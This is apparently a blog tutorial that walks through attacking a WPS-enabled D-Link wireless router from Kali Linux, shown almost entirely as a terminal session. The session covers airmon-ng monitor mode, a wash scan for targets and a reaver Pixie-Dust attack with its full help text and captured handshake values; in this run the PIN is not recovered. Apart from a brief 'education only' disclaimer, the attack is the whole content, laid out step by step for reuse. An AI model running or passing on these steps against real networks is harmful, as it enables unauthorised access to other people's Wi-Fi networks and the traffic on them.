Cracking wifi (WPS Config)in kali linux

we want to examing security a WPS modem config, we announce that this video is only for education, please do not use for illegal , wrong or bad way,you are  your self responsible  using illegal from this education.

 

root@kali:~/Desktop# ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 10:1f:74:e2:c8:ba  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 12  bytes 720 (720.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12  bytes 720 (720.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether d0:df:9a:95:6a:6f  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@kali:~/Desktop# airmon-ng check kill

Killing these processes:

  PID Name
 1925 wpa_supplicant

root@kali:~/Desktop# airmon-ng check


root@kali:~/Desktop# airmon start wlan0
bash: airmon: command not found
root@kali:~/Desktop# airmon-ng  start wlan0


PHY    Interface    Driver        Chipset

phy0    wlan0        ath9k        Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~/Desktop# wash -i
wash: option requires an argument — 'i'
Required Arguments:
    -i, –interface=<iface>              Interface to capture packets on
    -f, –file [FILE1 FILE2 FILE3 …]   Read packets from capture files

Optional Arguments:
    -c, –channel=<num>                  Channel to listen on [auto]
    -o, –out-file=<file>                Write data to file
    -n, –probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
    -D, –daemonize                      Daemonize wash
    -C, –ignore-fcs                     Ignore frame checksum errors
    -5, –5ghz                           Use 5GHz 802.11 channels
    -s, –scan                           Use scan mode
    -u, –survey                         Use survey mode [default]
    -P, –output-piped              Allows Wash output to be piped. Example. wash x|y|z…
    -g, –get-chipset                    Pipes output and runs reaver alongside to get chipset
    -h, –help                           Show help

Example:
    wash -i mon0

root@kali:~/Desktop# wash -i wlan0

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[X] ERROR: Failed to open 'wlan0' for capturing
root@kali:~/Desktop# wash -i wlan0mon

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
—————————————————————————————————————
90:8D:78:1D:6E:13       8            31        1.0               No                D-LinkSP
^C
root@kali:~/Desktop# reaver

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

Required Arguments:
    -i, –interface=<wlan>          Name of the monitor-mode interface to use
    -b, –bssid=<mac>               BSSID of the target AP

Optional Arguments:
    -m, –mac=<mac>                 MAC of the host system
    -e, –essid=<ssid>              ESSID of the target AP
    -c, –channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    -o, –out-file=<file>           Send output to a log file [stdout]
    -s, –session=<file>            Restore a previous session file
    -C, –exec=<command>            Execute the supplied command upon successful pin recovery
    -D, –daemonize                 Daemonize reaver
    -a, –auto                      Auto detect the best advanced options for the target AP
    -f, –fixed                     Disable channel hopping
    -5, –5ghz                      Use 5GHz 802.11 channels
    -v, –verbose                   Display non-critical warnings (-vv for more)
    -q, –quiet                     Only display critical messages
    -K  –pixie-dust=<number>       [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)
    -Z, –no-auto-pass              Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful
    -h, –help                      Show help

Advanced Options:
    -p, –pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    -d, –delay=<seconds>           Set the delay between pin attempts [1]
    -l, –lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, –max-attempts=<num>        Quit after num pin attempts
    -x, –fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    -r, –recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, –timeout=<seconds>         Set the receive timeout period [5]
    -T, –m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    -A, –no-associate              Do not associate with the AP (association must be done by another application)
    -N, –no-nacks                  Do not send NACK messages when out of order packets are received
    -S, –dh-small                  Use small DH keys to improve crack speed
    -L, –ignore-locks              Ignore locked state reported by the target AP
    -E, –eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -n, –nack                      Target AP always sends a NACK [Auto]
    -w, –win7                      Mimic a Windows 7 registrar [False]
    -X, –exhaustive                Set exhaustive mode from the beginning of the session [False]
    -1, –p1-index                  Set initial array index for the first half of the pin [False]
    -2, –p2-index                  Set initial array index for the second half of the pin [False]
    -P, –pixiedust-loop            Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
    -W, –generate-pin              Default Pin Generator by devttys0 team [1] Belkin [2] D-Link

Example:
    reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1

root@kali:~/Desktop# reaver -i wlan0mon -b 90:8D:78:1D:6E:13   -vv -K 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from 90:8D:78:1D:6E:13
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 8
[+] Associated with 90:8D:78:1D:6E:13 (ESSID: D-LinkSP)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5f:dd:63:de:3f:c7:b4:fd:50:3b:6e:c1:6d:e4:6a:0d
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: 48:58:1e:f1:bf:f6:a0:80:e4:ec:c8:7c:b1:2d:a0:cf
[P] PKR: 69:21:04:34:4f:a3:93:5e:d2:c9:d0:41:5b:2e:9d:83:02:46:64:4c:95:43:15:a1:eb:d2:fa:58:53:81:13:66:3d:fb:4f:57:99:ad:08:a9:d7:37:3b:66:c4:f5:50:90:8a:64:da:d9:3c:b5:e9:1d:64:ed:8a:0c:94:25:ea:78:c3:10:9f:c6:07:ec:12:ba:27:7b:6c:b7:55:93:d7:59:e0:26:79:06:50:6b:59:1a:b5:27:f7:2e:30:68:39:3a:e8:99:e9:ee:f9:88:e6:5d:d3:41:63:d5:01:cb:4c:9d:85:b1:c2:06:c5:a1:8d:76:c3:1c:4f:e4:e5:18:98:d2:a5:ec:15:cf:54:36:4b:98:db:cf:ba:17:ad:ea:b3:08:66:c1:37:93:5c:6c:09:fd:29:5f:27:9e:32:11:45:9e:e1:48:59:41:e2:47:9b:88:1b:31:58:67:a1:c2:31:87:00:53:b0:66:89:16:a5:11:82:89:54:5c:41:3a:ae:f1
[P] AuthKey: 67:d1:85:46:e3:e4:71:2c:60:16:60:d3:5a:75:29:87:9b:2b:6f:c5:11:ce:9f:f3:53:14:a9:f5:1e:1e:50:23
[+] Sending M2 message
[P] E-Hash1: cd:85:41:ce:7f:af:b6:b7:28:e7:e4:96:4a:89:b8:4d:93:bf:28:ce:17:a0:40:2d:7e:05:a0:71:f0:8b:c8:bd
[P] E-Hash2: 5c:b7:b7:70:86:b1:18:08:11:8a:2d:5b:71:22:65:1e:c0:44:fa:eb:cb:d6:63:54:cb:99:1b:e9:ce:4d:e2:07
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.2
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s 496 ms
[Pixie-Dust]  
[Pixie-Dust]   [!] The AP /might be/ vulnerable. Try again with –force or with another (newer) set of data.
[Pixie-Dust]  
root@kali:~/Desktop#

 

Sharing is caring!

Leave a Reply

Your email address will not be published. Required fields are marked *